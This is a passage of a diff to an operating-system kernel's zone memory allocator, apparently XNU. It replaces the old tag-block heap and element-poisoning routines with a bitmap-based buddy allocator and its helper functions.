while (TRUE) { - p = ztBlocks[w].next; - if (p == q) { - break; - } - if (ztBlocks[p].size >= count) { - break; - } - w = p; - } - ztBlocks[p].prev = index; - ztBlocks[w].next = index; - - // fault in first - ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0); - - // mark first & last with free flag and size - ztBlocks[index].free = TRUE; - ztBlocks[index].size = count; - ztBlocks[index].prev = w; - ztBlocks[index].next = p; - if (count > 1) { - index += (count - 1); - // fault in last - ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0); - ztBlocks[index].free = TRUE; - ztBlocks[index].size = count; - } +static struct zone_bits_chain * +zba_chain_for_node(struct zone_bits_allocator_header *zbah, size_t node, uint32_t order) +{ + vm_offset_t offs = (node - (1 << (ZBA_MAX_ORDER - order + 1)) + 1) << order; + return (struct zone_bits_chain *)((vm_offset_t)zbah + offs * ZBA_GRANULE); } -static uint32_t -ztAlloc(zone_t zone, uint32_t count) +static void +zba_node_flip_split(struct zone_bits_allocator_header *zbah, size_t node) { - uint32_t q, w, p, leftover; - - assert(count); - - q = ztLog2up(count); - if (q > ztFreeIndexMax) { - q = ztFreeIndexMax; - } - do{ - w = q; - while (TRUE) { - p = ztBlocks[w].next; - if (p == q) { - break; - } - if (ztBlocks[p].size >= count) { - // dequeue, mark both ends allocated - ztBlocks[w].next = ztBlocks[p].next; - ztBlocks[ztBlocks[p].next].prev = w; - ztBlocks[p].free = FALSE; - ztBlocksFree -= ztBlocks[p].size; - if (ztBlocks[p].size > 1) { - ztBlocks[p + ztBlocks[p].size - 1].free = FALSE; - } - - // fault all the allocation - ztFault(zone_tags_map, &ztBlocks[p], count * sizeof(ztBlocks[p]), 0); - // mark last as allocated - if (count > 1) { - ztBlocks[p + count - 1].free = FALSE; - } - // free remainder - leftover = ztBlocks[p].size - count; - if (leftover) { - ztFree(zone, p + ztBlocks[p].size - leftover, leftover); - } - - return p; - } - w = p; - } - q++; - }while (q <= ztFreeIndexMax); + zbah->zbah_bits[node / 64] ^= 1ull << (node % 64); +} - return -1U; +static bool +zba_node_is_split(struct zone_bits_allocator_header *zbah, size_t node) +{ + return zbah->zbah_bits[node / 64] & (1ull << (node % 64)); } -__startup_func static void -zone_tagging_init(vm_size_t max_zonemap_size) +zba_free(vm_offset_t addr, uint32_t order) { - kern_return_t ret; - vm_map_kernel_flags_t vmk_flags; - uint32_t idx; - - // allocate submaps VM_KERN_MEMORY_DIAG - - zone_tagbase_map_size = atop(max_zonemap_size) * sizeof(uint32_t); - vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; - vmk_flags.vmkf_permanent = TRUE; - ret = kmem_suballoc(kernel_map, &zone_tagbase_min, zone_tagbase_map_size, - FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG, - &zone_tagbase_map); + struct zone_bits_allocator_header *zbah = zba_header(addr); + struct zone_bits_chain *zbc; + size_t node = zba_node(addr, order); - if (ret != KERN_SUCCESS) { - panic("zone_init: kmem_suballoc failed"); - } - zone_tagbase_max = zone_tagbase_min + round_page(zone_tagbase_map_size); + while (node) { + size_t parent = zba_node_parent(node); - zone_tags_map_size = 2048 * 1024 * sizeof(vm_tag_t); - vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; - vmk_flags.vmkf_permanent = TRUE; - ret = kmem_suballoc(kernel_map, &zone_tags_min, zone_tags_map_size, - FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG, - &zone_tags_map); + zba_node_flip_split(zbah, parent); + if (zba_node_is_split(zbah, parent)) { + break; + } - if (ret != KERN_SUCCESS) { - panic("zone_init: kmem_suballoc failed"); + zbc = zba_chain_for_node(zbah, zba_node_buddy(node), order); + zba_remove_block(zbc); + order++; + node = parent; } - zone_tags_max = zone_tags_min + round_page(zone_tags_map_size); - - ztBlocks = (ztBlock *) zone_tags_min; - ztBlocksCount = (uint32_t)(zone_tags_map_size / sizeof(ztBlock)); - // initialize the qheads - lck_mtx_lock(&ztLock); + zba_push_block(zba_chain_for_node(zbah, node, order), order); +} - ztFault(zone_tags_map, &ztBlocks[0], sizeof(ztBlocks[0]), 0); - for (idx = 0; idx < ztFreeIndexCount; idx++) { - ztBlocks[idx].free = TRUE; - ztBlocks[idx].next = idx; - ztBlocks[idx].prev = idx; - ztBlocks[idx].size = 0; +static vm_size_t +zba_chunk_header_size(uint32_t n) +{ + vm_size_t hdr_size = sizeof(struct zone_bits_allocator_header); + if (n == 0) { + hdr_size += sizeof(struct zone_bits_allocator_meta); } - // free remaining space - ztFree(NULL, ztFreeIndexCount, ztBlocksCount - ztFreeIndexCount); - - lck_mtx_unlock(&ztLock); + return hdr_size; } static void -ztMemoryAdd(zone_t zone, vm_offset_t mem, vm_size_t size) +zba_init_chunk(uint32_t n) { - uint32_t * tagbase; - uint32_t count, block, blocks, idx; - size_t pages; - - pages = atop(size); - tagbase = ZTAGBASE(zone, mem); - - lck_mtx_lock(&ztLock); + vm_size_t hdr_size = zba_chunk_header_size(n); + vm_offset_t page = zba_page_addr(n); + struct zone_bits_allocator_header *zbah = zba_header(page); + vm_size_t size = ZBA_CHUNK_SIZE; + size_t node; - // fault tagbase - ztFault(zone_tagbase_map, tagbase, pages * sizeof(uint32_t), 0); - - if (!zone->tags_inline) { - // allocate tags - count = (uint32_t)(size / zone_elem_size(zone)); - blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock); - block = ztAlloc(zone, blocks); - if (-1U == block) { - ztDump(false); + for (uint32_t o = ZBA_MAX_ORDER + 1; o-- > 0;) { + if (size < hdr_size + (ZBA_GRANULE << o)) { + continue; } - assert(-1U != block); + size -= ZBA_GRANULE << o; + node = zba_node(page + size, o); + zba_node_flip_split(zbah, zba_node_parent(node)); + zba_push_block(zba_chain_for_node(zbah, node, o), o); } - lck_mtx_unlock(&ztLock); - - if (!zone->tags_inline) { - // set tag base for each page - block *= ztTagsPerBlock; - for (idx = 0; idx < pages; idx++) { - vm_offset_t esize = zone_elem_size(zone); - tagbase[idx] = block + (uint32_t)((ptoa(idx) + esize - 1) / esize); - } - } + zba_meta()->zbam_chunks = n + 1; } +__attribute__((noinline)) static void -ztMemoryRemove(zone_t zone, vm_offset_t mem, vm_size_t size) +zba_grow(void) { - uint32_t * tagbase; - uint32_t count, block, blocks, idx; - size_t pages; - - // set tag base for each page - pages = atop(size); - tagbase = ZTAGBASE(zone, mem); - block = tagbase[0]; - for (idx = 0; idx < pages; idx++) { - tagbase[idx] = 0xFFFFFFFF; - } + uint32_t chunk = zba_meta()->zbam_chunks; - lck_mtx_lock(&ztLock); - if (!zone->tags_inline) { - count = (uint32_t)(size / zone_elem_size(zone)); - blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock); - assert(block != 0xFFFFFFFF); - block /= ztTagsPerBlock; - ztFree(NULL /* zone is unlocked */, block, blocks); + zba_populate(chunk); + if (zba_meta()->zbam_chunks == chunk) { + zba_init_chunk(chunk); } - - lck_mtx_unlock(&ztLock); } -uint32_t -zone_index_from_tag_index(uint32_t tag_zone_index, vm_size_t * elem_size) +static vm_offset_t +zba_alloc(uint32_t order) { - simple_lock(&all_zones_lock, &zone_locks_grp); + struct zone_bits_allocator_header *zbah; + uint32_t cur = order; + vm_address_t addr; + size_t node; - zone_index_foreach(idx) { - zone_t z = &zone_array[idx]; - if (!z->tags) { - continue; - } - if (tag_zone_index != z->tag_zone_index) { - continue; + while ((addr = zba_try_pop_block(cur)) == 0) { + if (cur++ >= ZBA_MAX_ORDER) { + zba_grow(); + cur = order; } - - *elem_size = zone_elem_size(z); - simple_unlock(&all_zones_lock); - return idx; } - simple_unlock(&all_zones_lock); + zbah = zba_header(addr); + node = zba_node(addr, cur); + zba_node_flip_split(zbah, zba_node_parent(node)); + while (cur > order) { + cur--; + zba_node_flip_split(zbah, node); + node = zba_node_left_child(node); + zba_push_block(zba_chain_for_node(zbah, node + 1, cur), cur); + } - return -1U; + return addr; } -#endif /* VM_MAX_TAG_ZONES */ -#pragma mark zalloc helpers +#define zba_map_index(type, n) (n / (8 * sizeof(type))) +#define zba_map_bit(type, n) ((type)1 << (n % (8 * sizeof(type)))) +#define zba_map_mask_lt(type, n) (zba_map_bit(type, n) - 1) +#define zba_map_mask_ge(type, n) ((type)-zba_map_bit(type, n)) -const char * -zone_name(zone_t z) +#if !ZALLOC_TEST +static uint32_t +zba_bits_ref_order(uint32_t bref) { - return z->z_name; + return bref & 0x7; } -const char * -zone_heap_name(zone_t z) +static bitmap_t * +zba_bits_ref_ptr(uint32_t bref) { - if (__probable(z->kalloc_heap < KHEAP_ID_COUNT)) { - return kalloc_heap_names[z->kalloc_heap]; - } - return "invalid"; + return zba_slot_base() + (bref >> 3); } -static inline vm_size_t -zone_submaps_approx_size(void) +static vm_offset_t +zba_scan_bitmap_inline(zone_t zone, struct zone_page_metadata *meta, + vm_offset_t eidx) { - vm_size_t size = 0; + size_t i = eidx / 32; + uint32_t map; - for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) { - size += zone_submaps[idx]->size; + if (eidx % 32) { + map = meta[i].zm_bitmap & zba_map_mask_ge(uint32_t, eidx); + if (map) { + eidx = __builtin_ctz(map); + meta[i].zm_bitmap ^= 1u << eidx; + return i * 32 + eidx; + } + i++; } - return size; -} + uint32_t chunk_len = meta->zm_chunk_len; + if (chunk_len == 1 && zone->z_percpu) { + chunk_len = zpercpu_count(); + } + for (int j = 0; j < chunk_len; j++, i++) { + if (i >= chunk_len) { + i = 0; + } + if (__probable(map = meta[i].zm_bitmap)) { + meta[i].zm_bitmap &= map - 1; + return i * 32 + __builtin_ctz(map); + } + } -bool -zone_maps_owned(vm_address_t addr, vm_size_t size) -{ - return from_zone_map(addr, size); + zone_page_meta_accounting_panic(zone, meta, "zm_bitmap"); } -void -zone_map_sizes( - vm_map_size_t *psize, - vm_map_size_t *pfree, - vm_map_size_t *plargest_free) +static vm_offset_t +zba_scan_bitmap_ref(zone_t zone, struct zone_page_metadata *meta, + vm_offset_t eidx) { - vm_map_sizes(zone_submaps[Z_SUBMAP_IDX_GENERAL_MAP], psize, pfree, plargest_free); -} + uint32_t bits_size = 1 << zba_bits_ref_order(meta->zm_bitmap); + bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap); + size_t i = eidx / 64; + uint64_t map; -vm_map_t -zone_submap(zone_t zone) -{ - return submap_for_zone(zone); + if (eidx % 64) { + map = bits[i] & zba_map_mask_ge(uint64_t, eidx); + if (map) { + eidx = __builtin_ctzll(map); + bits[i] ^= 1ull << eidx; + return i * 64 + eidx; + } + i++; + } + + for (int j = 0; j < bits_size; i++, j++) { + if (i >= bits_size) { + i = 0; + } + if (__probable(map = bits[i])) { + bits[i] &= map - 1; + return i * 64 + __builtin_ctzll(map); + } + } + + zone_page_meta_accounting_panic(zone, meta, "zm_bitmap"); } -unsigned -zpercpu_count(void) +/*! + * @function zone_meta_find_and_clear_bit + * + * @brief + * The core of the bitmap allocator: find a bit set in the bitmaps. + * + * @discussion + * This method will round robin through available allocations, + * with a per-core memory of the last allocated element index allocated. + * + * This is done in order to avoid a fully LIFO behavior which makes exploiting + * double-free bugs way too practical. + * + * @param zone The zone we're allocating from. + * @param meta The main metadata for the chunk being allocated from. + */ +static vm_offset_t +zone_meta_find_and_clear_bit(zone_t zone, struct zone_page_metadata *meta) { - return zpercpu_early_count; + zone_stats_t zs = zpercpu_get(zone->z_stats); + vm_offset_t eidx = zs->zs_alloc_rr + 1; + + if (meta->zm_inline_bitmap) { + eidx = zba_scan_bitmap_inline(zone, meta, eidx); + } else { + eidx = zba_scan_bitmap_ref(zone, meta, eidx); + } + zs->zs_alloc_rr = (uint16_t)eidx; + return eidx; } -int -track_this_zone(const char *zonename, const char *logname) +/*! + * @function zone_meta_bits_init + * + * @brief + * Initializes the zm_bitmap field(s) for a newly assigned chunk. + * + * @param meta The main metadata for the initialized chunk. + * @param count The number of elements the chunk can hold + * (which might be partial for partially populated chunks). + * @param nbits The maximum nuber of bits that will be used. + */ +static void +zone_meta_bits_init(struct zone_page_metadata *meta, + uint32_t count, uint32_t nbits) { - unsigned int len; - const char *zc = zonename; - const char *lc = logname; - - /* - * Compare the strings. We bound the compare by MAX_ZONE_NAME. - */ + static_assert(ZONE_MAX_ALLOC_SIZE / ZONE_MIN_ELEM_SIZE <= + ZBA_GRANULE_BITS << ZBA_MAX_ORDER, "bitmaps will be large enough"); - for (len = 1; len <= MAX_ZONE_NAME; zc++, lc++, len++) { + if (meta->zm_inline_bitmap) { /* - * If the current characters don't match, check for a space in - * in the zone name and a corresponding period in the log name. - * If that's not there, then the strings don't match. + * We're called with the metadata zm_bitmap fields already + * zeroed out. */ - - if (*zc != *lc && !(*zc == ' ' && *lc == '.')) { - break; + for (size_t i = 0; 32 * i < count; i++) { + if (32 * i + 32 <= count) { + meta[i].zm_bitmap = ~0u; + } else { + meta[i].zm_bitmap = zba_map_mask_lt(uint32_t, count); + } } + } else { + uint32_t order = flsll((nbits - 1) / ZBA_GRANULE_BITS); + uint64_t *bits; - /* - * The strings are equal so far. If we're at the end, then it's a match. - */ + assert(order <= ZBA_MAX_ALLOC_ORDER); + assert(count <= ZBA_GRANULE_BITS << order); - if (*zc == '\0') { - return TRUE; + zba_lock(); + bits = (uint64_t *)zba_alloc(order); + zba_unlock(); + + for (size_t i = 0; i < 1u << order; i++) { + if (64 * i + 64 <= count) { + bits[i] = ~0ull; + } else if (64 * i < count) { + bits[i] = zba_map_mask_lt(uint64_t, count); + } else { + bits[i] = 0ull; + } } - } - return FALSE; + meta->zm_bitmap = (uint32_t)((vm_offset_t)bits - + (vm_offset_t)zba_slot_base()) + order; + } } -#if DEBUG || DEVELOPMENT - -vm_size_t -zone_element_info(void *addr, vm_tag_t * ptag) +/*! + * @function zone_meta_bits_merge + * + * @brief + * Adds elements [start, end) to a chunk being extended. + * + * @param meta The main metadata for the extended chunk. + * @param start The index of the first element to add to the chunk. + * @param end The index of the last (exclusive) element to add. + */ +static void +zone_meta_bits_merge(struct zone_page_metadata *meta, + uint32_t start, uint32_t end) { - vm_size_t size = 0; - vm_tag_t tag = VM_KERN_MEMORY_NONE; - struct zone_page_metadata *meta; - struct zone *src_zone; + if (meta->zm_inline_bitmap) { + while (start < end) { + size_t s_i = start / 32; + size_t s_e = end / 32; - if (from_zone_map(addr, sizeof(void *))) { - meta = zone_native_meta_from_addr(addr); - src_zone = &zone_array[meta->zm_index]; -#if VM_MAX_TAG_ZONES - if (__improbable(src_zone->tags)) { - tag = (ZTAG(src_zone, (vm_offset_t) addr)[0] >> 1); + if (s_i == s_e) { + meta[s_i].zm_bitmap |= zba_map_mask_lt(uint32_t, end) & + zba_map_mask_ge(uint32_t, start); + break; + } + + meta[s_i].zm_bitmap |= zba_map_mask_ge(uint32_t, start); + start += 32 - (start % 32); } -#endif /* VM_MAX_TAG_ZONES */ - size = zone_elem_size(src_zone); } else { -#if CONFIG_GZALLOC - gzalloc_element_size(addr, NULL, &size); -#endif /* CONFIG_GZALLOC */ - } - *ptag = tag; - return size; -} + uint64_t *bits = zba_bits_ref_ptr(meta->zm_bitmap); -#endif /* DEBUG || DEVELOPMENT */ + while (start < end) { + size_t s_i = start / 64; + size_t s_e = end / 64; -/* Someone wrote to freed memory. */ -__abortlike -static void -zone_element_was_modified_panic( - zone_t zone, - vm_offset_t element, - vm_offset_t found, - vm_offset_t expected, - vm_offset_t offset) -{ - panic("a freed zone element has been modified in zone %s%s: " - "expected %p but found %p, bits changed %p, " - "at offset %d of %d in element %p, cookies %p %p", - zone_heap_name(zone), - zone->z_name, - (void *) expected, - (void *) found, - (void *) (expected ^ found), - (uint32_t) offset, - (uint32_t) zone_elem_size(zone), - (void *) element, - (void *) zp_nopoison_cookie, - (void *) zp_poisoned_cookie); + if (s_i == s_e) { + bits[s_i] |= zba_map_mask_lt(uint64_t, end) & + zba_map_mask_ge(uint64_t, start); + break; + } + bits[s_i] |= zba_map_mask_ge(uint64_t, start); + start += 64 - (start % 64); + } + } } -/* The backup pointer is stored in the last pointer-sized location in an element. */ -__header_always_inline vm_offset_t * -get_backup_ptr(vm_size_t elem_size, vm_offset_t *element) +/*! + * @function zone_bits_free + * + * @brief + * Frees a bitmap to the zone bitmap allocator. + * + * @param bref + * A bitmap reference set by @c zone_meta_bits_init() in a @c zm_bitmap field. + */ +static void +zone_bits_free(uint32_t bref) { - return (vm_offset_t *)((vm_offset_t)element + elem_size - sizeof(vm_offset_t)); + zba_lock(); + zba_free((vm_offset_t)zba_bits_ref_ptr(bref), zba_bits_ref_order(bref)); + zba_unlock(); } -/* - * The primary and backup pointers don't match. - * Determine which one was likely the corrupted pointer, find out what it - * probably should have been, and panic. +/*! + * @function zone_meta_is_free + * + * @brief + * Returns whether a given element appears free. */ -__abortlike -static void -backup_ptr_mismatch_panic( - zone_t zone, - struct zone_page_metadata *page_meta, - vm_offset_t page, - vm_offset_t element) -{ - vm_offset_t primary = *(vm_offset_t *)element; - vm_offset_t backup = *get_backup_ptr(zone_elem_size(zone), &element); - vm_offset_t likely_backup; - vm_offset_t likely_primary; - zone_addr_kind_t kind = zone_addr_kind(page, zone_elem_size(zone)); - - likely_primary = primary ^ zp_nopoison_cookie; - boolean_t sane_backup; - boolean_t sane_primary = zone_page_meta_is_sane_element(zone, page_meta, - page, likely_primary, kind); - boolean_t element_was_poisoned = (backup & 0x1); - -#if defined(__LP64__) - /* We can inspect the tag in the upper bits for additional confirmation */ - if ((backup & 0xFFFFFF0000000000) == 0xFACADE0000000000) { - element_was_poisoned = TRUE; - } else if ((backup & 0xFFFFFF0000000000) == 0xC0FFEE0000000000) { - element_was_poisoned = FALSE; - } -#endif - - if (element_was_poisoned) { - likely_backup = backup ^ zp_poisoned_cookie; +static bool +zone_meta_is_free(struct zone_page_metadata *meta, zone_element_t ze) +{ + vm_offset_t eidx = zone_element_idx(ze); + if (meta->zm_inline_bitmap) { + uint32_t bit = zba_map_bit(uint32_t, eidx); + return meta[zba_map_index(uint32_t, eidx)].zm_bitmap & bit; } else { - likely_backup = backup ^ zp_nopoison_cookie; - } - sane_backup = zone_page_meta_is_sane_element(zone, page_meta, - page, likely_backup, kind); - - /* The primary is definitely the corrupted one */ - if (!sane_primary && sane_backup) { - zone_element_was_modified_panic(zone, element, primary, (likely_backup ^ zp_nopoison_cookie), 0); - } - - /* The backup is definitely the corrupted one */ - if (sane_primary && !sane_backup) { - zone_element_was_modified_panic(zone, element, backup, - (likely_primary ^ (element_was_poisoned ? zp_poisoned_cookie : zp_nopoison_cookie)), - zone_elem_size(zone) - sizeof(vm_offset_t)); - } - - /* - * Not sure which is the corrupted one. - * It's less likely that the backup pointer was overwritten with - * ( (sane address) ^ (valid cookie) ), so we'll guess that the - * primary pointer has been overwritten with a sane but incorrect address. - */ - if (sane_primary && sane_backup) { - zone_element_was_modified_panic(zone, element, primary, (likely_backup ^ zp_nopoison_cookie), 0); + bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap); + uint64_t bit = zba_map_bit(uint64_t, eidx); + return bits[zba_map_index(uint64_t, eidx)] & bit; } - - /* Neither are sane, so just guess. */ - zone_element_was_modified_panic(zone, element, primary, (likely_backup ^ zp_nopoison_cookie), 0); } -/* - * zone_sequestered_page_get - * z is locked +/*! + * @function zone_meta_mark_free + * + * @brief + * Marks an element as free and returns whether it was marked as used. */ -static struct zone_page_metadata * -zone_sequestered_page_get(zone_t z, vm_offset_t *page) +static bool +zone_meta_mark_free(struct zone_page_metadata *meta, zone_element_t ze) { - const zone_addr_kind_t kind = ZONE_ADDR_NATIVE; + vm_offset_t eidx = zone_element_idx(ze); - if (!zone_pva_is_null(z->pages_sequester)) { - if (os_sub_overflow(z->sequester_page_count, z->alloc_pages, - &z->sequester_page_count)) { - zone_accounting_panic(z, "sequester_page_count wrap-around"); + if (meta->zm_inline_bitmap) { + uint32_t bit = zba_map_bit(uint32_t, eidx); + if (meta[zba_map_index(uint32_t, eidx)].zm_bitmap & bit) { + return false; + } + meta[zba_map_index(uint32_t, eidx)].zm_bitmap ^= bit; + } else { + bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap); + uint64_t bit = zba_map_bit(uint64_t, eidx); + if (bits[zba_map_index(uint64_t, eidx)] & bit) { + return false; } - return zone_meta_queue_pop(z, &z->pages_sequester, kind, page); + bits[zba_map_index(uint64_t, eidx)] ^= bit; } - - return NULL; + return true; } -/* - * zone_sequestered_page_populate - * z is unlocked - * page_meta is invalid on failure +/*! + * @function zone_meta_mark_used + * + * @brief + * Marks an element as used and returns whether it was marked as free */ -static kern_return_t -zone_sequestered_page_populate(zone_t z, struct zone_page_metadata *page_meta, - vm_offset_t space, vm_size_t alloc_size, int zflags) +static bool +zone_meta_mark_used(struct zone_page_metadata *meta, zone_element_t ze) { - kern_return_t retval; + vm_offset_t eidx = zone_element_idx(ze); - assert(alloc_size == ptoa(z->alloc_pages)); - retval = kernel_memory_populate(submap_for_zone(z), space, alloc_size, - zflags, VM_KERN_MEMORY_ZONE); - if (retval != KERN_SUCCESS) { - lock_zone(z); - zone_meta_queue_push(z, &z->pages_sequester, page_meta, ZONE_ADDR_NATIVE); - z->sequester_page_count += z->alloc_pages; - unlock_zone(z); + if (meta->zm_inline_bitmap) { + uint32_t bit = zba_map_bit(uint32_t, eidx); + if (meta[zba_map_index(uint32_t, eidx)].zm_bitmap & bit) { + meta[zba_map_index(uint32_t, eidx)].zm_bitmap ^= bit; + return true; + } + } else { + bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap); + uint64_t bit = zba_map_bit(uint64_t, eidx); + if (bits[zba_map_index(uint64_t, eidx)] & bit) { + bits[zba_map_index(uint64_t, eidx)] ^= bit; + return true; + } } - return retval; + return false; } -#pragma mark Zone poisoning/zeroing - +#endif /* !ZALLOC_TEST */ +/*! @} */ +#pragma mark ZTAGS +#if !ZALLOC_TEST +#if VM_MAX_TAG_ZONES /* - * Initialize zone poisoning - * called from zone_bootstrap before any allocations are made from zalloc + * Zone tagging allows for per "tag" accounting of allocations for the kalloc + * zones only. + * + * There are 3 kinds of tags that can be used: + * - pre-registered VM_KERN_MEMORY_* + * - dynamic tags allocated per call sites in core-kernel (using vm_tag_alloc()) + * - per-kext tags computed by IOKit (using the magic VM_TAG_BT marker). + * + * The VM tracks the statistics in lazily allocated structures. + * See vm_tag_will_update_zone(), vm_tag_update_zone_size(). + * + * If for some reason the requested tag cannot be accounted for, + * the tag is forced to VM_KERN_MEMORY_KALLOC which is pre-allocated. + * + * Each allocated element also remembers the tag it was assigned, + * in its ztSlot() which lets zalloc/zfree update statistics correctly. */ -__startup_func -static void -zp_bootstrap(void) -{ - char temp_buf[16]; - /* - * Initialize backup pointer random cookie for poisoned elements - * Try not to call early_random() back to back, it may return - * the same value if mach_absolute_time doesn't have sufficient time - * to tick over between calls. - * (This is only a problem on embedded devices) - */ - zp_poisoned_cookie = (uintptr_t) early_random(); +// for zones with tagging enabled: - /* -zp: enable poisoning for every alloc and free */ - if (PE_parse_boot_argn("-zp", temp_buf, sizeof(temp_buf))) { - zp_factor = 1; - } +// calculate a pointer to the tag base entry, +// holding either a uint32_t the first tag offset for a page in the zone map, +// or two uint16_t tags if the page can only hold one or two elements - /* -no-zp: disable poisoning */ - if (PE_parse_boot_argn("-no-zp", temp_buf, sizeof(temp_buf))) { - zp_factor = 0; - printf("Zone poisoning disabled\n"); - } +#define ZTAGBASE(zone, element) \ + (&((uint32_t *)zone_tagbase_min)[atop((element) - \ + zone_info.zi_map_range[ZONE_ADDR_NATIVE].min_address)]) - /* Initialize backup pointer random cookie for unpoisoned elements */ - zp_nopoison_cookie = (uintptr_t) early_random(); +static vm_offset_t zone_tagbase_min; +static vm_offset_t zone_tagbase_max; +static vm_offset_t zone_tagbase_map_size; +static vm_map_t zone_tagbase_map; -#if MACH_ASSERT - if (zp_poisoned_cookie == zp_nopoison_cookie) { - panic("early_random() is broken: %p and %p are not random\n", - (void *) zp_poisoned_cookie, (void *) zp_nopoison_cookie); - } -#endif +static vm_offset_t zone_tags_min; +static vm_offset_t zone_tags_max; +static vm_offset_t zone_tags_map_size; +static vm_map_t zone_tags_map; - /* - * Use the last bit in the backup pointer to hint poisoning state - * to backup_ptr_mismatch_panic. Valid zone pointers are aligned, so - * the low bits are zero. - */ - zp_poisoned_cookie |= (uintptr_t)0x1ULL; - zp_nopoison_cookie &= ~((uintptr_t)0x1ULL); +// simple heap allocator for allocating the tags for new memory -#if defined(__LP64__) - /* - * Make backup pointers more obvious in GDB for 64 bit - * by making OxFFFFFF... ^ cookie = 0xFACADE... - * (0xFACADE = 0xFFFFFF ^ 0x053521) - * (0xC0FFEE = 0xFFFFFF ^ 0x3f0011) - * The high 3 bytes of a zone pointer are always 0xFFFFFF, and are checked - * by the sanity check, so it's OK for that part of the cookie to be predictable. - * - * TODO: Use #defines, xors, and shifts - */ +static LCK_MTX_EARLY_DECLARE(ztLock, &zone_locks_grp); /* heap lock */ - zp_poisoned_cookie &= 0x000000FFFFFFFFFF; - zp_poisoned_cookie |= 0x0535210000000000; /* 0xFACADE */ +enum{ + ztFreeIndexCount = 8, + ztFreeIndexMax = (ztFreeIndexCount - 1), + ztTagsPerBlock = 4 +}; - zp_nopoison_cookie &= 0x000000FFFFFFFFFF; - zp_nopoison_cookie |= 0x3f00110000000000; /* 0xC0FFEE */ +struct ztBlock { +#if __LITTLE_ENDIAN__ + uint64_t free:1, + next:21, + prev:21, + size:21; +#else +// ztBlock needs free bit least significant +#error !__LITTLE_ENDIAN__ #endif +}; +typedef struct ztBlock ztBlock; - /* - * Initialize zp_min_size to two cachelines. Elements smaller than this will - * be zero-ed. - */ - ml_cpu_info_t cpu_info; - ml_cpu_get_info(&cpu_info); - zp_min_size = 2 * cpu_info.cache_line_size; -} - -inline uint32_t -zone_poison_count_init(zone_t zone) -{ - return zp_factor + (((uint32_t)zone_elem_size(zone)) >> zp_scale) ^ - (mach_absolute_time() & 0x7); -} +static ztBlock * ztBlocks; +static uint32_t ztBlocksCount; +static uint32_t ztBlocksFree; -#if ZALLOC_ENABLE_POISONING -static bool -zfree_poison_element(zone_t zone, uint32_t *zp_count, vm_offset_t elem) +static uint32_t +ztLog2up(uint32_t size) { - bool poison = false; - uint32_t zp_count_local; - - assert(!zone->percpu); - if (zp_factor != 0) { - /* - * Poison the memory of every zp_count-th element before it ends up - * on the freelist to catch use-after-free and use of uninitialized - * memory. - * - * Every element is poisoned when zp_factor is set to 1. - * - */ - zp_count_local = os_atomic_load(zp_count, relaxed); - if (__improbable(zp_count_local == 0 || zp_factor == 1)) { - poison = true; - - os_atomic_store(zp_count, zone_poison_count_init(zone), relaxed); - - /* memset_pattern{4|8} could help make this faster: */ - vm_offset_t *element_cursor = ((vm_offset_t *) elem); - vm_offset_t *end_cursor = (vm_offset_t *)(elem + zone_elem_size(zone)); - - for (; element_cursor < end_cursor; element_cursor++) { - *element_cursor = ZONE_POISON; - } - } else { - os_atomic_store(zp_count, zp_count_local - 1, relaxed); - /* - * Zero first zp_min_size bytes of elements that aren't being poisoned. - * Element size is larger than zp_min_size in this path as elements - * that are smaller will always be zero-ed. - */ - bzero((void *) elem, zp_min_size); - } + if (1 == size) { + size = 0; + } else { + size = 32 - __builtin_clz(size - 1); } - return poison; -} -#else -static bool -zfree_poison_element(zone_t zone, uint32_t *zp_count, vm_offset_t elem) -{ -#pragma unused(zone, zp_count, elem) - assert(!zone->percpu); - return false; + return size; } -#endif -__attribute__((always_inline)) -static bool -zfree_clear(zone_t zone, vm_offset_t addr, vm_size_t elem_size) +// pointer to the tag for an element +static vm_tag_t * +ztSlot(zone_t zone, vm_offset_t element) { - assert(zone->zfree_clear_mem); - if (zone->percpu) { - zpercpu_foreach_cpu(i) { - bzero((void *)(addr + ptoa(i)), elem_size); + vm_tag_t *result; + if (zone->tags_inline) { + result = (vm_tag_t *)ZTAGBASE(zone, element); + if ((PAGE_MASK & element) >= zone_elem_size(zone)) { + result++; } } else { - bzero((void *)addr, elem_size); + result = &((vm_tag_t *)zone_tags_min)[ZTAGBASE(zone, element)[0] + + (element & PAGE_MASK) / zone_elem_size(zone)]; } - - return true; + return result; } -/* - * Zero the element if zone has zfree_clear_mem flag set else poison - * the element if zp_count hits 0. - */ -__attribute__((always_inline)) -bool -zfree_clear_or_poison(zone_t zone, uint32_t *zp_count, vm_offset_t addr) +static uint32_t +ztLog2down(uint32_t size) { - vm_size_t elem_size = zone_elem_size(zone); - - if (zone->zfree_clear_mem) { - return zfree_clear(zone, addr, elem_size); - } - - return zfree_poison_element(zone, zp_count, (vm_offset_t)addr); + size = 31 - __builtin_clz(size); + return size; } +static void +ztFault(vm_map_t map, const void * address, size_t size, uint32_t flags) +{ + vm_map_offset_t addr = (vm_map_offset_t) address; + vm_map_offset_t page, end; + + page = trunc_page(addr); + end = round_page(addr + size); + + for (; page < end; page += page_size) { + if (!pmap_find_phys(kernel_pmap, page)) { + kern_return_t __unused + ret = kernel_memory_populate(map, page, PAGE_SIZE, + KMA_KOBJECT | flags, VM_KERN_MEMORY_DIAG); + assert(ret == KERN_SUCCESS); + } + } +} + +static boolean_t +ztPresent(const void * address, size_t size) +{ + vm_map_offset_t addr = (vm_map_offset_t) address; + vm_map_offset_t page, end; + boolean_t result; + + page = trunc_page(addr); + end = round_page(addr + size); + for (result = TRUE; (page < end); page += page_size) { + result = pmap_find_phys(kernel_pmap, page); + if (!result) { + break; + } + } + return result; +} + + +void __unused +ztDump(boolean_t sanity); +void __unused +ztDump(boolean_t sanity) +{ + uint32_t q, cq, p; + + for (q = 0; q <= ztFreeIndexMax; q++) { + p = q; + do{ + if (sanity) { + cq = 